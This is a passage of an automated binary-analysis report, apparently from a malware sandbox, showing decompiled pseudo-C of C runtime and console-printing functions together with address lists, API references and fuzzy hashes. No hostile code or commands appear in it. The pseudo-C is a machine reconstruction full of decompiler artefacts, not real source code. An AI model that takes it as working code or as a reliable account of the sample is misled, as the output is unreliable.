                                                                      												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                                      												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                                      												_t435 = _t435 + 0xc;
                                                                      												_t397 = _t421 + 0x22;
                                                                      												asm("movsb");
                                                                      												_t322 = 1 +  *(_t433 - 8);
                                                                      												 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                                      												_t391 =  *(_t433 - 0xc) - 1;
                                                                      												__eflags = _t391;
                                                                      												 *(_t433 - 0xc) = _t391;
                                                                      											}
                                                                      											L46:
                                                                      											 *(_t433 - 8) = 0;
                                                                      											while(1) {
                                                                      												L48:
                                                                      												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      												if(__eflags >= 0) {
                                                                      													goto L50;
                                                                      												}
                                                                      												L49:
                                                                      												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                                      												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                                      												_t435 = _t435 + 0xc;
                                                                      												_t397 = _t421 + 0x22;
                                                                      												asm("movsb");
                                                                      												L47:
                                                                      												_t322 = 1 +  *(_t433 - 8);
                                                                      												__eflags = _t322;
                                                                      												 *(_t433 - 8) = _t322;
                                                                      											}
                                                                      											goto L50;
                                                                      										}
                                                                      										goto L86;
                                                                      									case 3:
                                                                      										L37:
                                                                      										goto L87;
                                                                      								}
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						L87:
                                                                      						return _t249;
                                                                      						L88:
                                                                      					}
                                                                      				}
                                                                      			}

































                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be347b
                                                                      0x00be3481
                                                                      0x00be348a
                                                                      0x00be348d
                                                                      0x00be348d
                                                                      0x00be3490
                                                                      0x00be3493
                                                                      0x00be3493
                                                                      0x00be3499
                                                                      0x00be34a2
                                                                      0x00be34ad
                                                                      0x00be34ae
                                                                      0x00be34b3
                                                                      0x00be34cc
                                                                      0x00be34e2
                                                                      0x00be34f0
                                                                      0x00be34f5
                                                                      0x00be34fa
                                                                      0x00be34fd
                                                                      0x00be3500
                                                                      0x00be3505
                                                                      0x00be3505
                                                                      0x00be350b
                                                                      0x00be350f
                                                                      0x00be3510
                                                                      0x00be3510
                                                                      0x00be3515
                                                                      0x00be351e
                                                                      0x00be352c
                                                                      0x00be3530
                                                                      0x00be353a
                                                                      0x00be353e
                                                                      0x00be3548
                                                                      0x00be354c
                                                                      0x00be3556
                                                                      0x00be355a
                                                                      0x00be355b
                                                                      0x00be3560
                                                                      0x00be3565
                                                                      0x00be356e
                                                                      0x00be3571
                                                                      0x00be357e
                                                                      0x00000000
                                                                      0x00be3573
                                                                      0x00be3573
                                                                      0x00be3579
                                                                      0x00be3579
                                                                      0x00be3583
                                                                      0x00be3583
                                                                      0x00be3587
                                                                      0x00be358a
                                                                      0x00be3595
                                                                      0x00be3595
                                                                      0x00be358c
                                                                      0x00be358c
                                                                      0x00be3590
                                                                      0x00be3593
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3593
                                                                      0x00be359c
                                                                      0x00be35a0
                                                                      0x00be35a3
                                                                      0x00be35a5
                                                                      0x00be35a8
                                                                      0x00be35ab
                                                                      0x00be35ad
                                                                      0x00be35ad
                                                                      0x00be35ab
                                                                      0x00be35b4
                                                                      0x00be35b8
                                                                      0x00be35bb
                                                                      0x00be3361
                                                                      0x00be3361
                                                                      0x00be3366
                                                                      0x00be336a
                                                                      0x00be3388
                                                                      0x00be338d
                                                                      0x00be3392
                                                                      0x00be3397
                                                                      0x00be336c
                                                                      0x00be3370
                                                                      0x00be3375
                                                                      0x00be337a
                                                                      0x00be337f
                                                                      0x00be337f
                                                                      0x00be339a
                                                                      0x00be339e
                                                                      0x00be33a3
                                                                      0x00be33a8
                                                                      0x00be33ad
                                                                      0x00be33b4
                                                                      0x00be33b9
                                                                      0x00be33cb
                                                                      0x00be33cb
                                                                      0x00be33cb
                                                                      0x00be33cf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be33d1
                                                                      0x00be33d1
                                                                      0x00be33d6
                                                                      0x00be33db
                                                                      0x00be33e0
                                                                      0x00be33c2
                                                                      0x00be33c5
                                                                      0x00be33c5
                                                                      0x00be33c8
                                                                      0x00be33c8
                                                                      0x00be33e5
                                                                      0x00be33e5
                                                                      0x00be33e9
                                                                      0x00be33eb
                                                                      0x00be33f1
                                                                      0x00be33ff
                                                                      0x00be33ff
                                                                      0x00be33ff
                                                                      0x00be3403
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3405
                                                                      0x00be340b
                                                                      0x00be3422
                                                                      0x00be3422
                                                                      0x00be3422
                                                                      0x00be3424
                                                                      0x00be33f6
                                                                      0x00be33f9
                                                                      0x00be33f9
                                                                      0x00be33fc
                                                                      0x00be33fc
                                                                      0x00be3427
                                                                      0x00be3427
                                                                      0x00be3439
                                                                      0x00be3439
                                                                      0x00be343c
                                                                      0x00be343f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3441
                                                                      0x00be3447
                                                                      0x00be3458
                                                                      0x00be3458
                                                                      0x00be3458
                                                                      0x00be345a
                                                                      0x00be3430
                                                                      0x00be3433
                                                                      0x00be3433
                                                                      0x00be3436
                                                                      0x00be3436
                                                                      0x00be3439
                                                                      0x00be345d
                                                                      0x00be3460
                                                                      0x00be3463
                                                                      0x00be3465
                                                                      0x00be3465
                                                                      0x00be346c
                                                                      0x00be346f
                                                                      0x00be3472
                                                                      0x00be348d
                                                                      0x00be3490
                                                                      0x00be3493
                                                                      0x00be3493
                                                                      0x00000000
                                                                      0x00be3493
                                                                      0x00be35c1
                                                                      0x00be35c1
                                                                      0x00be35c5
                                                                      0x00be35c8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be35ce
                                                                      0x00be35ce
                                                                      0x00be35d2
                                                                      0x00be35d5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be35db
                                                                      0x00be35e4
                                                                      0x00be35e4
                                                                      0x00be35e9
                                                                      0x00be35eb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2ee9
                                                                      0x00be2ee9
                                                                      0x00be2ef0
                                                                      0x00be2ef7
                                                                      0x00be2efe
                                                                      0x00be2f0f
                                                                      0x00be2f14
                                                                      0x00be2f17
                                                                      0x00be2f1c
                                                                      0x00be2f1c
                                                                      0x00be2f29
                                                                      0x00be2f37
                                                                      0x00be2f45
                                                                      0x00be2f55
                                                                      0x00be2f5c
                                                                      0x00be2f61
                                                                      0x00be2f67
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2f69
                                                                      0x00be2f73
                                                                      0x00be2f78
                                                                      0x00be2f7b
                                                                      0x00be2f80
                                                                      0x00be2f80
                                                                      0x00be2f83
                                                                      0x00be2f87
                                                                      0x00be2f91
                                                                      0x00be2f98
                                                                      0x00be2f9d
                                                                      0x00be2fa3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2fa5
                                                                      0x00be2fb3
                                                                      0x00be2fb8
                                                                      0x00be2fbd
                                                                      0x00be2fc5
                                                                      0x00be2fc5
                                                                      0x00be2fc8
                                                                      0x00be2fca
                                                                      0x00be2fca
                                                                      0x00be2fcf
                                                                      0x00be2fd0
                                                                      0x00be2fd5
                                                                      0x00be2fd5
                                                                      0x00be2fdd
                                                                      0x00be2fe0
                                                                      0x00be2fe3
                                                                      0x00be2fe9
                                                                      0x00be2fea
                                                                      0x00be2ff2
                                                                      0x00be2ffb
                                                                      0x00be3000
                                                                      0x00be3005
                                                                      0x00be3011
                                                                      0x00be3016
                                                                      0x00be301b
                                                                      0x00be3027
                                                                      0x00be302c
                                                                      0x00be3031
                                                                      0x00be303d
                                                                      0x00be3042
                                                                      0x00be3047
                                                                      0x00be304c
                                                                      0x00be3053
                                                                      0x00be3058
                                                                      0x00be306a
                                                                      0x00be306a
                                                                      0x00be306a
                                                                      0x00be306e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3070
                                                                      0x00be3070
                                                                      0x00be3075
                                                                      0x00be307a
                                                                      0x00be3064
                                                                      0x00be3064
                                                                      0x00be3067
                                                                      0x00be3067
                                                                      0x00be307f
                                                                      0x00be3083
                                                                      0x00be3088
                                                                      0x00be308d
                                                                      0x00be3092
                                                                      0x00be3095
                                                                      0x00be309c
                                                                      0x00be309f
                                                                      0x00be30a2
                                                                      0x00be30ab
                                                                      0x00be30b4
                                                                      0x00be30b7
                                                                      0x00be30bb
                                                                      0x00be327b
                                                                      0x00be327b
                                                                      0x00be3284
                                                                      0x00be3289
                                                                      0x00be328e
                                                                      0x00be329a
                                                                      0x00be329f
                                                                      0x00be32a4
                                                                      0x00be32a9
                                                                      0x00be32ac
                                                                      0x00000000
                                                                      0x00be30c1
                                                                      0x00be30c1
                                                                      0x00be30c4
                                                                      0x00000000
                                                                      0x00be30cb
                                                                      0x00be30cf
                                                                      0x00be30d4
                                                                      0x00be30d9
                                                                      0x00be30e1
                                                                      0x00be30ea
                                                                      0x00be30ef
                                                                      0x00be30f2
                                                                      0x00be3104
                                                                      0x00be3104
                                                                      0x00be3107
                                                                      0x00be310a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be310c
                                                                      0x00be3119
                                                                      0x00be311e
                                                                      0x00be3123
                                                                      0x00be3126
                                                                      0x00be3128
                                                                      0x00be3130
                                                                      0x00be3141
                                                                      0x00be3141
                                                                      0x00be3141
                                                                      0x00be3143
                                                                      0x00be3147
                                                                      0x00be3147
                                                                      0x00be314a
                                                                      0x00be314a
                                                                      0x00be30fe
                                                                      0x00be30fe
                                                                      0x00be3101
                                                                      0x00be3101
                                                                      0x00be314f
                                                                      0x00be314f
                                                                      0x00be3152
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be315a
                                                                      0x00be315a
                                                                      0x00be315e
                                                                      0x00be3163
                                                                      0x00be3168
                                                                      0x00be316d
                                                                      0x00be3170
                                                                      0x00be3181
                                                                      0x00be318a
                                                                      0x00be318c
                                                                      0x00be3196
                                                                      0x00be319b
                                                                      0x00be31a0
                                                                      0x00be31a5
                                                                      0x00be31a5
                                                                      0x00be31a8
                                                                      0x00be31b1
                                                                      0x00be31b1
                                                                      0x00be31b5
                                                                      0x00be31b8
                                                                      0x00be31b9
                                                                      0x00be31be
                                                                      0x00be31c5
                                                                      0x00be31d7
                                                                      0x00be31d7
                                                                      0x00be31d7
                                                                      0x00be31da
                                                                      0x00be31dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be31df
                                                                      0x00be31df
                                                                      0x00be31e6
                                                                      0x00be31e9
                                                                      0x00be31ec
                                                                      0x00be31f1
                                                                      0x00be31f9
                                                                      0x00be31fb
                                                                      0x00be3200
                                                                      0x00be3203
                                                                      0x00be3209
                                                                      0x00be320c
                                                                      0x00be320f
                                                                      0x00be3214
                                                                      0x00be3214
                                                                      0x00be3214
                                                                      0x00be3214
                                                                      0x00be3216
                                                                      0x00be3217
                                                                      0x00be321a
                                                                      0x00be321a
                                                                      0x00be321d
                                                                      0x00be321d
                                                                      0x00be31ce
                                                                      0x00be31d1
                                                                      0x00be31d1
                                                                      0x00be31d4
                                                                      0x00be31d4
                                                                      0x00be3222
                                                                      0x00be3222
                                                                      0x00be3225
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be322d
                                                                      0x00be322d
                                                                      0x00be323f
                                                                      0x00be323f
                                                                      0x00be323f
                                                                      0x00be3242
                                                                      0x00be3245
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3247
                                                                      0x00be324a
                                                                      0x00be324d
                                                                      0x00be3253
                                                                      0x00be3256
                                                                      0x00be3259
                                                                      0x00be325e
                                                                      0x00be325e
                                                                      0x00be325e
                                                                      0x00be325e
                                                                      0x00be3260
                                                                      0x00be3261
                                                                      0x00be3264
                                                                      0x00be3267
                                                                      0x00be3236
                                                                      0x00be3239
                                                                      0x00be3239
                                                                      0x00be323c
                                                                      0x00be323c
                                                                      0x00be326c
                                                                      0x00be326c
                                                                      0x00be326f
                                                                      0x00be32b3
                                                                      0x00be32b3
                                                                      0x00be32b7
                                                                      0x00be32b9
                                                                      0x00be32c2
                                                                      0x00be32c7
                                                                      0x00be32cc
                                                                      0x00be32d1
                                                                      0x00be32d4
                                                                      0x00be32d4
                                                                      0x00be32d9
                                                                      0x00be32dd
                                                                      0x00be35dd
                                                                      0x00be35dd
                                                                      0x00be32e3
                                                                      0x00be32e3
                                                                      0x00be32e3
                                                                      0x00be32f0
                                                                      0x00be3307
                                                                      0x00be3307
                                                                      0x00be330a
                                                                      0x00be330d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be330f
                                                                      0x00be3315
                                                                      0x00be3326
                                                                      0x00be3326
                                                                      0x00be3326
                                                                      0x00be3328
                                                                      0x00be32f8
                                                                      0x00be32fb
                                                                      0x00be3301
                                                                      0x00be3301
                                                                      0x00be3304
                                                                      0x00be3304
                                                                      0x00be332b
                                                                      0x00be332b
                                                                      0x00be333d
                                                                      0x00be333d
                                                                      0x00be3340
                                                                      0x00be3343
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3345
                                                                      0x00be334b
                                                                      0x00be335c
                                                                      0x00be335c
                                                                      0x00be335c
                                                                      0x00be335e
                                                                      0x00be3334
                                                                      0x00be3337
                                                                      0x00be3337
                                                                      0x00be333a
                                                                      0x00be333a
                                                                      0x00000000
                                                                      0x00be333d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3274
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be30c4
                                                                      0x00000000
                                                                      0x00be30bb
                                                                      0x00be35f1
                                                                      0x00be35f6
                                                                      0x00000000
                                                                      0x00be35f6
                                                                      0x00be348d

                                                                      APIs
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE34B3
                                                                      • _wprintf.LIBCMT ref: 00BE3560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$ConsoleCursorHandlePosition
                                                                      • String ID: %d.$%s%s%s%s
                                                                      • API String ID: 3459578117-4028964860
                                                                      • Opcode ID: 48f1cb2662f3ec175bcd719e6b40cb5be39662b640770e5e79cb533934b9bf89
                                                                      • Instruction ID: bfaa49e2e156f19d65c573f7387cc5a3d55abaea1756db52e0f9338b6c5da602
                                                                      • Opcode Fuzzy Hash: 48f1cb2662f3ec175bcd719e6b40cb5be39662b640770e5e79cb533934b9bf89
                                                                      • Instruction Fuzzy Hash: 01417171E0408AAFCF18CB89C4D5ABEBBF6EFA1704F5581D9D001AB346DB349A45CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E00BF1673(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v20;
                                                                      				void* __edi;
                                                                      				signed int _t35;
                                                                      				int _t38;
                                                                      				intOrPtr* _t44;
                                                                      				int _t47;
                                                                      				short* _t49;
                                                                      				intOrPtr _t50;
                                                                      				intOrPtr _t54;
                                                                      				int _t55;
                                                                      				void* _t57;
                                                                      				signed int _t59;
                                                                      				char* _t62;
                                                                      
                                                                      				_t62 = _a8;
                                                                      				if(_t62 == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				}
                                                                      				_t50 = _a12;
                                                                      				if(_t50 == 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				if( *_t62 != 0) {
                                                                      					_push(_t57);
                                                                      					E00BE7857( &_v20, _t57, _a16);
                                                                      					_t35 = _v20;
                                                                      					__eflags =  *(_t35 + 0xa8);
                                                                      					if( *(_t35 + 0xa8) != 0) {
                                                                      						_t38 = E00BF124B( *_t62 & 0x000000ff,  &_v20);
                                                                      						__eflags = _t38;
                                                                      						if(_t38 == 0) {
                                                                      							__eflags = _a4;
                                                                      							_t59 = 1;
                                                                      							_t28 = _v20 + 4; // 0x20432f41
                                                                      							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                      							if(__eflags != 0) {
                                                                      								L21:
                                                                      								__eflags = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									_t54 = _v12;
                                                                      									_t31 = _t54 + 0x70;
                                                                      									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                      									__eflags =  *_t31;
                                                                      								}
                                                                      								return _t59;
                                                                      							}
                                                                      							L20:
                                                                      							_t44 = E00BE8EFF(__eflags);
                                                                      							_t59 = _t59 | 0xffffffff;
                                                                      							__eflags = _t59;
                                                                      							 *_t44 = 0x2a;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t59 = _v20;
                                                                      						__eflags =  *(_t59 + 0x74) - 1;
                                                                      						if( *(_t59 + 0x74) <= 1) {
                                                                      							L15:
                                                                      							_t20 = _t59 + 0x74; // 0x3a202020
                                                                      							__eflags = _t50 -  *_t20;
                                                                      							L16:
                                                                      							if(__eflags < 0) {
                                                                      								goto L20;
                                                                      							}
                                                                      							__eflags = _t62[1];
                                                                      							if(__eflags == 0) {
                                                                      								goto L20;
                                                                      							}
                                                                      							L18:
                                                                      							_t22 = _t59 + 0x74; // 0x3a202020
                                                                      							_t59 =  *_t22;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t12 = _t59 + 0x74; // 0x3a202020
                                                                      						__eflags = _t50 -  *_t12;
                                                                      						if(__eflags < 0) {
                                                                      							goto L16;
                                                                      						}
                                                                      						__eflags = _a4;
                                                                      						_t17 = _t59 + 0x74; // 0x3a202020
                                                                      						_t18 = _t59 + 4; // 0x20432f41
                                                                      						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                                      						_t59 = _v20;
                                                                      						__eflags = _t47;
                                                                      						if(_t47 != 0) {
                                                                      							goto L18;
                                                                      						}
                                                                      						goto L15;
                                                                      					}
                                                                      					_t55 = _a4;
                                                                      					__eflags = _t55;
                                                                      					if(_t55 != 0) {
                                                                      						 *_t55 =  *_t62 & 0x000000ff;
                                                                      					}
                                                                      					_t59 = 1;
                                                                      					goto L21;
                                                                      				}
                                                                      				_t49 = _a4;
                                                                      				if(_t49 != 0) {
                                                                      					 *_t49 = 0;
                                                                      				}
                                                                      				goto L5;
                                                                      			}


















                                                                      0x00bf167b
                                                                      0x00bf1680
                                                                      0x00bf169a
                                                                      0x00000000
                                                                      0x00bf169a
                                                                      0x00bf1682
                                                                      0x00bf1687
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf168c
                                                                      0x00bf16a0
                                                                      0x00bf16a7
                                                                      0x00bf16ac
                                                                      0x00bf16af
                                                                      0x00bf16b6
                                                                      0x00bf16d5
                                                                      0x00bf16dc
                                                                      0x00bf16de
                                                                      0x00bf1722
                                                                      0x00bf172a
                                                                      0x00bf1736
                                                                      0x00bf173f
                                                                      0x00bf1741
                                                                      0x00bf1751
                                                                      0x00bf1751
                                                                      0x00bf1755
                                                                      0x00bf1757
                                                                      0x00bf175a
                                                                      0x00bf175a
                                                                      0x00bf175a
                                                                      0x00bf175a
                                                                      0x00000000
                                                                      0x00bf1760
                                                                      0x00bf1743
                                                                      0x00bf1743
                                                                      0x00bf1748
                                                                      0x00bf1748
                                                                      0x00bf174b
                                                                      0x00000000
                                                                      0x00bf174b
                                                                      0x00bf16e0
                                                                      0x00bf16e3
                                                                      0x00bf16e7
                                                                      0x00bf1710
                                                                      0x00bf1710
                                                                      0x00bf1710
                                                                      0x00bf1713
                                                                      0x00bf1713
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf1715
                                                                      0x00bf1719
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf171b
                                                                      0x00bf171b
                                                                      0x00bf171b
                                                                      0x00000000
                                                                      0x00bf171b
                                                                      0x00bf16e9
                                                                      0x00bf16e9
                                                                      0x00bf16ec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf16f0
                                                                      0x00bf16fa
                                                                      0x00bf1700
                                                                      0x00bf1703
                                                                      0x00bf1709
                                                                      0x00bf170c
                                                                      0x00bf170e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf170e
                                                                      0x00bf16b8
                                                                      0x00bf16bb
                                                                      0x00bf16bd
                                                                      0x00bf16c2
                                                                      0x00bf16c2
                                                                      0x00bf16c7
                                                                      0x00000000
                                                                      0x00bf16c7
                                                                      0x00bf168e
                                                                      0x00bf1693
                                                                      0x00bf1697
                                                                      0x00bf1697
                                                                      0x00000000

                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BF16A7
                                                                      • __isleadbyte_l.LIBCMT ref: 00BF16D5
                                                                      • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,00BFFF04,?,00000000), ref: 00BF1703
                                                                      • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,00BFFF04,?,00000000), ref: 00BF1739
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: e8f4e2db75c397ea82c7c1d4d654881dba61afbfdff06fdbc2f5676a43a598f2
                                                                      • Instruction ID: 51db18793842eefa3d5f04ebf9d2e8099abea16bbfa12566ee55c1c2d043c937
                                                                      • Opcode Fuzzy Hash: e8f4e2db75c397ea82c7c1d4d654881dba61afbfdff06fdbc2f5676a43a598f2
                                                                      • Instruction Fuzzy Hash: E331AD7160024AEFDB219E79C844BBA7BE5FF41350F194CA8E568D71A0EB30EC59DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00BEECB1(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				intOrPtr _t25;
                                                                      				void* _t26;
                                                                      
                                                                      				_t25 = _a16;
                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                      					_t26 = E00BEF1FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      					goto L9;
                                                                      				} else {
                                                                      					_t35 = _t25 - 0x66;
                                                                      					if(_t25 != 0x66) {
                                                                      						__eflags = _t25 - 0x61;
                                                                      						if(_t25 == 0x61) {
                                                                      							L7:
                                                                      							_t26 = E00BEED37(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                      						} else {
                                                                      							__eflags = _t25 - 0x41;
                                                                      							if(__eflags == 0) {
                                                                      								goto L7;
                                                                      							} else {
                                                                      								_t26 = E00BEF473(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      							}
                                                                      						}
                                                                      						L9:
                                                                      						return _t26;
                                                                      					} else {
                                                                      						return E00BEF3B4(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                      					}
                                                                      				}
                                                                      			}





                                                                      0x00beecb4
                                                                      0x00beecba
                                                                      0x00beed2d
                                                                      0x00000000
                                                                      0x00beecc1
                                                                      0x00beecc1
                                                                      0x00beecc4
                                                                      0x00beecdf
                                                                      0x00beece2
                                                                      0x00beed02
                                                                      0x00beed14
                                                                      0x00beece4
                                                                      0x00beece4
                                                                      0x00beece7
                                                                      0x00000000
                                                                      0x00beece9
                                                                      0x00beecfb
                                                                      0x00beecfb
                                                                      0x00beece7
                                                                      0x00beed32
                                                                      0x00beed36
                                                                      0x00beecc6
                                                                      0x00beecde
                                                                      0x00beecde
                                                                      0x00beecc4

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                      • Instruction ID: 9ac2ca31c2413f0dda20717c1a415e629db1479747029a102037861af906c709
                                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                      • Instruction Fuzzy Hash: 6B014B3244018EFBCF125E85CC428EE3FA2FF18354F5884A5FA2959231D336D9B1AB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E00BECC10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				LONG* _t20;
                                                                      				signed int _t25;
                                                                      				void* _t31;
                                                                      				LONG* _t33;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      
                                                                      				_t35 = __eflags;
                                                                      				_t29 = __edx;
                                                                      				_t24 = __ebx;
                                                                      				_push(0xc);
                                                                      				_push(0xbfd9a0);
                                                                      				E00BE9160(__ebx, __edi, __esi);
                                                                      				_t31 = E00BED59F(__edx, __edi, _t35);
                                                                      				_t25 =  *0xc01c6c; // 0xfffffffe
                                                                      				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                      					E00BEBE5F(0xd);
                                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                      					_t33 =  *(_t31 + 0x68);
                                                                      					 *(_t34 - 0x1c) = _t33;
                                                                      					__eflags = _t33 -  *0xc01524; // 0x1201220
                                                                      					if(__eflags != 0) {
                                                                      						__eflags = _t33;
                                                                      						if(__eflags != 0) {
                                                                      							__eflags = InterlockedDecrement(_t33);
                                                                      							if(__eflags == 0) {
                                                                      								__eflags = _t33 - 0xc01820;
                                                                      								if(__eflags != 0) {
                                                                      									E00BE8F53(_t33);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t20 =  *0xc01524; // 0x1201220
                                                                      						 *(_t31 + 0x68) = _t20;
                                                                      						_t33 =  *0xc01524; // 0x1201220
                                                                      						 *(_t34 - 0x1c) = _t33;
                                                                      						InterlockedIncrement(_t33);
                                                                      					}
                                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                                      					E00BECCAC();
                                                                      				} else {
                                                                      					_t33 =  *(_t31 + 0x68);
                                                                      				}
                                                                      				_t38 = _t33;
                                                                      				if(_t33 == 0) {
                                                                      					E00BE751F(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                                      				}
                                                                      				return E00BE91A5(_t33);
                                                                      			}









                                                                      0x00becc10
                                                                      0x00becc10
                                                                      0x00becc10
                                                                      0x00becc10
                                                                      0x00becc12
                                                                      0x00becc17
                                                                      0x00becc21
                                                                      0x00becc23
                                                                      0x00becc2c
                                                                      0x00becc4d
                                                                      0x00becc53
                                                                      0x00becc57
                                                                      0x00becc5a
                                                                      0x00becc5d
                                                                      0x00becc63
                                                                      0x00becc65
                                                                      0x00becc67
                                                                      0x00becc70
                                                                      0x00becc72
                                                                      0x00becc74
                                                                      0x00becc7a
                                                                      0x00becc7d
                                                                      0x00becc82
                                                                      0x00becc7a
                                                                      0x00becc72
                                                                      0x00becc83
                                                                      0x00becc88
                                                                      0x00becc8b
                                                                      0x00becc91
                                                                      0x00becc95
                                                                      0x00becc95
                                                                      0x00becc9b
                                                                      0x00becca2
                                                                      0x00becc34
                                                                      0x00becc34
                                                                      0x00becc34
                                                                      0x00becc37
